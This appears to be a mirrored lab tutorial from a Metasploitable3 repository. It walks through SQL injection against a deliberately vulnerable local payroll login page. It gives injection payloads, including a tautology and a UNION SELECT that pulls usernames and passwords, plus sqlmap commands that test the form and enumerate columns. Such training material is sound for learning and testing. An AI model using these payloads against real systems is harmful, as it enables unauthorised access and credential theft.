mirror of
https://github.com/ACIC-Africa/metasploitable3.git
synced 2024-07-02 19:15:49 +02:00
3.3 KiB
3.3 KiB
For this tutorial you will need the following tools
- Browser (Prefarably Mozilla)
- Burpsuite
- SQLMap
- Try and login using the following credentials:
Field Value USERNAME admin PASSWORD admin
RESULTS: The webpage will display your username and no content
2. Try and login using the following credentials:
Field | Value |
---|---|
USERNAME | ' |
PASSWORD | admin |
RESULTS: The webpage will be blank
- Try and login using the following credentials:
Field Value USERNAME ' or 1;#' PASSWORD admin
RESULTS: The web page will return all the user content 4. Use SQLMap to extract the database using the following commands:
sqlmap -u http://127.0.0.1:7000/payroll_app.php --data="user=admin&password=admin&s=OK" -p user --method POST
RESULTS: SQLMap will identify whether the web application is vulnerable to SQL Injection
-
Use SQLMap to extract the columns in the table
sqlmap -u http://127.0.0.1:7000/payroll_app.php --data="user=admin&password=admin&s=OK" -p user --method POST --columns
RESULTS: SQLMap will retrieve the columns on the application tables
- Use the column names to retrieve the user credentials:
Field Value USERNAME ' or 1 union select 1,username,password,1;#' PASSWORD admin